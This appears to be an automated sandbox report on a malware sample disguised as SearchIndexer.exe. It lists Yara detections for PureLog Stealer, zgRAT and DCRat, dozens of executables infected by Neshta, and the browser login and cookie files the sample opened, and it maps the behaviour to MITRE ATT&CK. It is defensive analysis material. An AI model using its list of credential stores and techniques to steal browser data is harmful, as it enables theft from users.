Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: SearchIndexer.exe, type: SAMPLE
Source: Yara match	File source: 1.0.SearchIndexer.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.1712832866.0000000000A62000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1708339397.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: SearchIndexer.exe, type: SAMPLE
Source: Yara match	File source: 1.0.SearchIndexer.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000001.00000002.2127156307.00000000132DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SearchIndexer.exe PID: 3168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tAVtSoJGTaCxrZiXcJn.exe PID: 8740, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: SearchIndexer.exe, type: SAMPLE
Source: Yara match	File source: 1.0.SearchIndexer.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.1712832866.0000000000A62000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1708339397.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: SearchIndexer.exe, type: SAMPLE
Source: Yara match	File source: 1.0.SearchIndexer.exe.a60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Multimedia Platform\tAVtSoJGTaCxrZiXcJn.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Defender\SearchIndexer.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	141 Windows Management Instrumentation	1 Scripting	11 Process Injection	333 Masquerading	1 OS Credential Dumping	341 Security Software Discovery	1 Taint Shared Content	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	21 Disable or Modify Tools	11 Input Capture	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	261 Virtualization/Sandbox Evasion	Security Account Manager	261 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	144 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SearchIndexer.exe	89%	Virustotal		Browse
SearchIndexer.exe	100%	ReversingLabs	Win32.Virus.Neshta
SearchIndexer.exe	100%	Avira	W32/Neshta.A
SearchIndexer.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Uninstall.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Avira	W32/Neshta.A
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Uninstall.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe	95%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\AutoIt3\Au3Info.exe	95%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	95%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	95%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	95%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	97%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	95%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	95%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\AutoIt3\Uninstall.exe	95%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	ReversingLabs	Win32.Virus.Neshta
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	ReversingLabs	Win32.Virus.Neshta
